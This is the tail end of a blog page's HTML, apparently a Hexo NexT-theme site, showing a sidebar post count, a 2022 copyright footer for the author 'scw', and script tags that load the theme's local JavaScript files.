      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">scw</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
